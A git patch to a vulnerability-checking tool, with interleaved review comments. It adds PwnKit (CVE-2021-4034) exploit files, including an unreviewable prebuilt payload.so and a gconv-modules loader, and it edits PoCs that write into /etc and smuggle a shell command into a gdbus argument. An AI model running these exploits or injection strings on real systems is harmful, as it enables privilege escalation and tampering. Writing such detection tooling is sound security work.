From 6f92768056741d339356bad0ffa17d746fbf2b86 Mon Sep 17 00:00:00 2001
From: song
Date: Fri, 10 Mar 2023 12:15:48 +0800
Subject: [PATCH] =?UTF-8?q?=E6=96=B0=E5=A2=9Eupdate=E6=A8=A1=E5=9D=97;?= =?UTF-8?q?=E6=B7=BB=E5=8A=A0poc=E6=A8=A1=E6=9D=BF;=E4=BF=AE=E6=94=B9?= =?UTF-8?q?=E9=83=A8=E5=88=86poc=E8=BE=93=E5=87=BA=E6=A0=BC=E5=BC=8F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../CVE-2021-4034/CVE-2021-4034.yaml | 2 +-
 .../CVE-2021-4034/GCONV_PATH=./exploit | 0
 .../CVE-2021-4034/exploit/gconv-modules | 1 +
 data/SystemPocs/CVE-2021-4034/payload.so | Bin 0 -> 431 bytes
 .../CVE-2022-0351/CVE-2022-0351.yaml | 12 ------
 .../SystemPocs/KVE-2022-0205/KVE-2022-0205.py | 6 ++-
 .../SystemPocs/KVE-2022-0206/KVE-2022-0206.sh | 2 +
 .../SystemPocs/KVE-2022-0210/KVE-2022-0210.py | 2 +
 data/Yaml Formwork/formwork.yaml | 34 ++++++++++++++++
 docs/genmai使用文档.wps | Bin 279040 -> 283648 bytes
 src/genmai/ArgParser/ParameterParser.go | 3 +-
 src/genmai/Update.go | 38 ++++++++++++++++++
 12 files changed, 85 insertions(+), 15 deletions(-)
 create mode 100755 data/SystemPocs/CVE-2021-4034/GCONV_PATH=./exploit
 create mode 100644 data/SystemPocs/CVE-2021-4034/exploit/gconv-modules
 create mode 100755 data/SystemPocs/CVE-2021-4034/payload.so
 create mode 100644 data/Yaml Formwork/formwork.yaml
 create mode 100644 src/genmai/Update.go
diff --git a/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml b/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml
index e736f04..ef157f5 100644
--- a/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml
+++ b/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml
@@ -1,5 +1,5 @@
 FormatVer: 20230306
-Id: CVE-2021-4043
+Id: CVE-2021-4034
 Belong: system
 PocHazardLevel: low
 Source: https://github.com/berdav/CVE-2021-4034
diff --git a/data/SystemPocs/CVE-2021-4034/GCONV_PATH=./exploit b/data/SystemPocs/CVE-2021-4034/GCONV_PATH=./exploit
new file mode 100755
index 0000000..e69de29
diff --git a/data/SystemPocs/CVE-2021-4034/exploit/gconv-modules b/data/SystemPocs/CVE-2021-4034/exploit/gconv-modules new file mode 100644 index 0000000..ace8b1b --- /dev/null +++ b/data/SystemPocs/CVE-2021-4034/exploit/gconv-modules @@ -0,0 +1 @@ +module UTF-8// INTERNAL ../payload 2 diff --git a/data/SystemPocs/CVE-2021-4034/payload.so b/data/SystemPocs/CVE-2021-4034/payload.so new file mode 100755 index 0000000000000000000000000000000000000000..8080e4067b61fb56977aa6669490e5d955413c65 GIT binary patch literal 431 zcmb<-^>JfjWMqH=W(GS35N{Gx$N?&`0j2;*J1|%ph}Q3b|g7;=6a|(XP`8L z07L~7RG$G<9Gy;p8U&+Z`asIrpmHDzmp+&h4k!cJjm$7fAUy$UKa2*s3m@QtO2Wd2 x70QR{hq(>L=Rz}#8;y_2^)UROl^Ma$>ajyVDKk&MID=tkKuCO0T$VLZ5CEU~6hr_3 literal 0 HcmV?d00001 diff --git a/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml b/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml index 8dc1ede..3e74c38 100644 --- a/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml +++ b/data/SystemPocs/CVE-2022-0351/CVE-2022-0351.yaml @@ -33,18 +33,6 @@ SiteRequests: Exec : ./CVE-2022-0351 Args : ExpireTime: #second - - # < input - # > output - # . wait - # ? condition - # : content - # - #组合起来 - # >. 等待直到输出 - # << 输入字符 - # >?判断条件 - # ??判断程序错误码 eg. "??:0" Inter: - "??:0" Condition: None diff --git a/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py b/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py index 3bda459..2a6931e 100644 --- a/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py +++ b/data/SystemPocs/KVE-2022-0205/KVE-2022-0205.py @@ -36,5 +36,9 @@ def copy_file(target_dir, src_file): os.system('touch restore_all_sound_file.txt') copy_file("/etc", os.path.realpath("./restore_all_sound_file.txt")) -os.system('ls -l /etc/restore_all_sound_file.txt') +result=os.popen('ls -l /etc/restore_all_sound_file.txt') +if result.read=="restore_all_sound_file.txt": + print("succ") +else : + print("fail",result.read()) os.system('rm restore_all_sound_file.txt') \ No newline at end of file 
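Review bot: `gconv-modules` points at `../payload`, which this commit supplies only as a prebuilt 431-byte `payload.so` (mode 100755) inside a git binary patch, with no source or build step anywhere in the diff, so the shared object the PoC loads cannot be reviewed from this change. Committing the C source and building it at install time, or at least recording the file's provenance and a SHA-256 next to it, would let users verify what they are about to run; the YAML already names https://github.com/berdav/CVE-2021-4034 as `Source`, but nothing here ties the binary to it.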
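Review bot: In KVE-2022-0205.py the new check `if result.read=="restore_all_sound_file.txt":` compares the bound method `result.read` with a string, so it is always false and the script prints `fail` whatever happened on the host. Adding the missing call would not be enough, because `ls -l` prints a long listing with a trailing newline that never equals the bare file name. Testing the file directly avoids both problems and the extra shell: `if os.path.exists('/etc/restore_all_sound_file.txt'):` followed by `print("succ")`, with `print("fail")` in the `else`. The earlier part of the script is outside the hunk.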
diff --git a/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh b/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh
index 42c9080..75a3281 100644
--- a/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh
+++ b/data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh
@@ -4,4 +4,6 @@ if ls /tmp/toggleCameraDevicTest.txt
 then
 gdbus call --system --dest org.ukui.kds --object-path / --method org.ukui.kds.interface.toggleCameraDevice "1';rm /tmp/toggleCameraDevicTest.txt;'"
 echo 'successfully'
+else
+echo 'fail'
 fi
\ No newline at end of file
diff --git a/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py b/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py
index 3477de4..6a94747 100644
--- a/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py
+++ b/data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py
@@ -12,4 +12,6 @@ set_main_source("/etc", os.path.realpath('./set_main_source.txt'))
 result=os.popen('ls /etc/set_main_source.txt')
 if result.read() :
 print("successfully")
+else:
+ print("fail")
 os.system('rm set_main_source.txt')
\ No newline at end of file
diff --git a/data/Yaml Formwork/formwork.yaml b/data/Yaml Formwork/formwork.yaml
new file mode 100644
index 0000000..8beb9f7
--- /dev/null
+++ b/data/Yaml Formwork/formwork.yaml
@@ -0,0 +1,34 @@
+FormatVer:
+Id:
+Belong:
+PocHazardLevel:
+Source:
+SiteInfo:
+ Name:
+ Severity:
+ Description:
+
+ ScopeOfInfluence:
+
+ References:
+ -
+ SiteClassification:
+ CvssMetrics:
+ CvssScore:
+ CveId:
+ CweId:
+ CnvdId:
+ KveId:
+ Tags:
+ -
+SiteRequests:
+ Implement:
+ ImArray:
+ - Inter :
+ InterArgs :
+ Exec :
+ Args :
+ ExpireTime:
+ Inter:
+ -
+ Condition:
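Review bot: In KVE-2022-0206.sh, `echo 'successfully'` still runs as soon as the marker file exists before the `gdbus call`, without checking that the call actually removed `/tmp/toggleCameraDevicTest.txt`, so a fixed system would be reported the same way as a vulnerable one. The added `else` branch only covers the case where the marker was never there. Re-testing the file after the call would make the verdict reflect the outcome, for example `if [ ! -e /tmp/toggleCameraDevicTest.txt ]; then echo 'successfully'; else echo 'fail'; fi`, and the failing path should also remove the leftover marker. The first three lines of the script are outside the hunk, so this assumes the marker is created there.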
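Review bot: formwork.yaml ships as a bare skeleton with no comments, while this same commit deletes from CVE-2022-0351.yaml a legend for the `Inter` step syntax (`<` input, `>` output, `.` wait, `?` condition, `:` content, `"??:0"` to test the exit code). Moving that legend into the template as comments above the final `Inter:` key would keep it available to PoC authors. One-line comments on fields whose values are not obvious would help too, such as `# second` on `ExpireTime:` and the accepted values of `Belong` and `PocHazardLevel` (the CVE-2021-4034 file uses `system` and `low`).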
diff --git a/docs/genmai使用文档.wps b/docs/genmai使用文档.wps index b2c284ca1fdd8dff91644c4eb33f51bd9e04ec85..ad32db45b73e15c7c333e3a80674a82885e76079 100644 GIT binary patch delta 5077 zcmc(jdr;KZ701v0?PYi6A)qVraF<;cVO<2#L5jpt9ZPZW_2ae>qgpU=mc$w&_cDIgU%z^m0i5vos^ zl@60?QS1>pf!6$Ap;zBgEb1a9qkjU#T-6f=LS!d}9PCeIQf<04^FSlfY}8+hFsr9I z9Y9*I<=YjTnyE{Y`=L=FHAe|EFN=Uas2mzbG!J_GDwJpn($AyOAa$hNpg)EV{vp(n z`i_1xQ1BMWz>>r%JN z=&M;MXXO^TT}Rem@RXh{il5~y8auV0FM=jeJ-V42)V#@c86DgzHqbejl4!A8dHC z>e8yr61C;pwC)ba`qfigT+_-cQX0BzkEi64mt57gY#}?1$B)xtYg;Pgwq0lz^;UFO z>zA42FU_S)O6nRyCVJwD^jI-lT&>$!)zB}Xy_Fur7+1oSD^S_tAKx<6wPK7bQQwVt z4Gn`po;EjHacLPsmesvd4$Ygq_-wNq_LxgNU6);#wuSpLOAK>&Rv;d>Exwqe@2;<^ z^_onz!Yg7Xg+#1*gJ`-@5cSh7$o9@m*ei5pSA_a-LZKRIi&k6XP3j`^eTp){yVty1 zC{g9= zsH-VY$Iii1THuUy&s(r#Iu%YDM8%WzG!;w(m0+oZs*yd~NRuZLJvPxwb$`H?96~;e z#e&w0C-#%e!IFv6xB^s76r_F`KN;E&Ruj#RE{3XBn_g{=GxchcJkA1VlzZOsgT2qyw_z#It()LG zR{-;WPc2aTRX5Ow1<1hj+zyU_qu?Ys1x|x=Z|?O>=Y5^!>1(fwuk%5Dbl#WDAiw76 zacp-_=xxh%7I^NdS0m@FUiWm*D}c8(>3QxH6OjZ1KnW-VJHamSGjQUtwzx2RSfW}J zlLFTtr@mrK=yR5XX5_Yw7ntQ^TkHFHBVga$y;;7K<(S(0EcZChZ?JA}+e&1_q$JYM zF*7fNeV`ru0(5}SK7Q}mk%Qim`Vyf&j`wz?ZMj1F_9Uaekk1%=zTmS3pDXxG!RHBn zWAodZ-_-2ruVQ7~d_KJyL*%?VGC5AXuNEi8spZKLjswAk&jly81SeL(F^n<9V2Rb3 zh5AXdDK`CnD?M}+hmY<(dRGcP|09-gp$Sc)uZb8##!WKlx((0yY%P&)FNXHxTO2g zP3HlN9Bhc;(=sm}ezCG6W@p=B(o#mrj8cMoz7bAj#EtrLbf6v^gSR;L3JnIaAP&TX z1fZa<|Ea(_$HN|;44_K33X0+@y*4#P&Q#|p#?E~yGE3+ua7ieaBrNvd0GHx+<;E>) zu7BMX;sQ3B#%O;_l{JRXoK5eQc=vQpamcBP?IHBR@FVc+j(3NJ+8a)J-;mc|^^ME= z=*sw}f^`)~Ut9Ocu69q=AJ2bSb#3#Ng_H}?Fn#{?Z_WRDOJLvlLlv6jZ|NDpKUu;`g^`$v~{f(K|Px$OrCw=cs zx#s`;(KYg%J%`ey;?2|N3X!df;SXr0I^h&T+iF)*#rL$=>`J<~WB8IvrLa=7+Ld@U zuX%VxJ%-XQLqB1=g=n@qVOHCkqqN<2C02|Mv^m|}@QAXhDbS|w+^uc&fi}N8*VQIF z&?fBspeA8xg1k;!o#Ja02Q}M8<$+teGy0nfeL%q+f5Xm`7nO@GO7jkXZ`zq3=!T1W zEqa4)pysF(F}XshkXkTcAU zFI%@47mGaPQR~pGb(h}q#~X|GPcJOh`j3$9TI@(Uye&h53Ss^JX`H}YdXxV^WA+`E!`FPtXDaG5`=h?DB-w(xQ_&_C}LatkK y|JsUC(&~?OZqJds46;A^({l1;a(XOcaUdQffFZyPEP$I@yF!lJJ6(BlwfHX;G#p9* delta 1641 
zcmZ{ke@vT27{~A4_ujXK0$ZU#3#Cw~O~V*J7Lq|%L%Se_f`s9i%aZZKxJk@naKjh} zN)r}{i8{7Z-euY1q9K_YROqys*$@1~g=9`#;*_W$(HVb5!-m<|kFx##Yl;Avyu&?vnEQfq$_=wd6+h%^zlFhFdqcd<2yhMiYW=I*N z@P?{QaB2xnH$T&^t7s>rmORO~NtwKLyd=S=lHgMtxAP0*SxTIT$avpw-Sfk19<(&79p_W>E-G>A$>VNMfWPmtL;KQG zWWYOKZBoeeaJEhrmoJ%cUu~8f`6m%P3q2nGEo1CnLL?9gX5ldK0);^|v$E2O!z3y{ zTRSLI!a_BVR8xMTu1mL6JnZ*`{2`~mMY7+Q2@!}!@p~XY=&QKauw{MaPq%9>oqcil ziOGSE%fJ87!T)M-@tlCw`k3kPm4!`ZGw-~)bZz3s7he~DGxuFuS@e5lPh^g_2dWC3 zvypp$zV`V2Jl{)^o%gOquQuIXsaC5oy57DNkVd_%XU{9RWZ2+JN$W;0(%S=2b;#>L z?B)y*bEW~x2>A-6fdzmPM1BP#35!5vMZ7POnSOEk2?-w3=De)i*djUIf6q{_Ftts4 zvbSkZ_}FCFyOp7yd0B8Yz6#g>W4&q`>Yq15J6OjCs7t$B#}4vNiRmUpr0{60XJvdrO4p|RtWwE@$*0}%vp!m* zJy*{L6fZ32v^({zPxV9Gj+)7a5L$~v{Bsse*}x1eAP3|ED@Y7IjL=W$m{_D$wK7Ml XkOVo1FQOf3Wf|d9t*nzC>2dr61?7mB diff --git a/src/genmai/ArgParser/ParameterParser.go b/src/genmai/ArgParser/ParameterParser.go index 0fb3cd6..309c6cc 100644 --- a/src/genmai/ArgParser/ParameterParser.go +++ b/src/genmai/ArgParser/ParameterParser.go @@ -114,7 +114,8 @@ func ParameterParser(sSystem string,sKernel string,sWeb string,sBaseLine string, if Update=="true"{ if sSystem=="false"&&sKernel=="false"&&sWeb=="false"&&sBaseLine=="false" { - fmt.Println("Updating") + fmt.Println("Updating...") + genmai.Update() return }else{ fmt.Println("The update process does not allow other processes") diff --git a/src/genmai/Update.go b/src/genmai/Update.go new file mode 100644 index 0000000..43aefc4 --- /dev/null +++ b/src/genmai/Update.go 
@@ -0,0 +1,38 @@
+package genmai
+import(
+ "fmt"
+ "bytes"
+ "os/exec"
+ "os"
+ "strings"
+)
+func Update(){
+ currentDir, err:= os.Getwd()
+ if err != nil {
+ panic(err)
+ } else {
+ }
+ currentDir=currentDir+"/../"
+ os.Chdir(currentDir)
+
+ currentDir, err = os.Getwd()
+ if err != nil {
+ panic(err)
+ } else {
+ cmd := exec.Command("git","pull")
+ var stdout, stderr bytes.Buffer
+ cmd.Stdout = &stdout // 标准输出
+ cmd.Stderr = &stderr // 标准错误
+ err := cmd.Run()
+ outStr, errStr := string(stdout.Bytes()), string(stderr.Bytes())
+ if len(errStr)!=0{
+ fmt.Printf(errStr)
+ }
+ outStr=strings.TrimSpace(outStr)
+ if err != nil {
+ fmt.Println("Updte Err:", err)
+ }
+ fmt.Println(outStr)
+ }
+
+}
\ No newline at end of file
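Review bot: `Update` runs `git pull` in the parent of the process's working directory and ignores the `os.Chdir` result, so the pull is not tied to the genmai checkout: started from elsewhere, git will act on (and read the configuration of) whichever repository contains that directory, and the process cwd stays changed afterwards. The function also panics on an `os.Getwd` failure, passes git's stderr to `fmt.Printf` as a format string, and misspells its message as `"Updte Err:"`; since it returns nothing and the caller in ParameterParser.go returns straight after `genmai.Update()`, a failed update probably still exits with status 0. The sketch below sets `cmd.Dir` instead of calling `os.Chdir`, reports errors instead of panicking, and prints stderr with `fmt.Print`. Because the pulled tree holds PoCs that the tool then executes, it is also worth considering `--ff-only` and a commit-signature check (`git pull --verify-signatures`) before trusting what was fetched.

```go
// Update runs "git pull" in the parent of the current working directory and
// prints git's output; failures are reported on stdout instead of panicking.
func Update() {
	wd, err := os.Getwd()
	if err != nil {
		fmt.Println("Update Err:", err)
		return
	}
	cmd := exec.Command("git", "pull")
	cmd.Dir = wd + "/../" // run in the checkout without changing the process cwd
	// … unchanged: stdout and stderr buffers attached to cmd …
	err = cmd.Run()
	if stderr.Len() != 0 {
		fmt.Print(stderr.String()) // Print, not Printf: git output is data, not a format string
	}
	if err != nil {
		fmt.Println("Update Err:", err)
	}
	fmt.Println(strings.TrimSpace(stdout.String()))
}
```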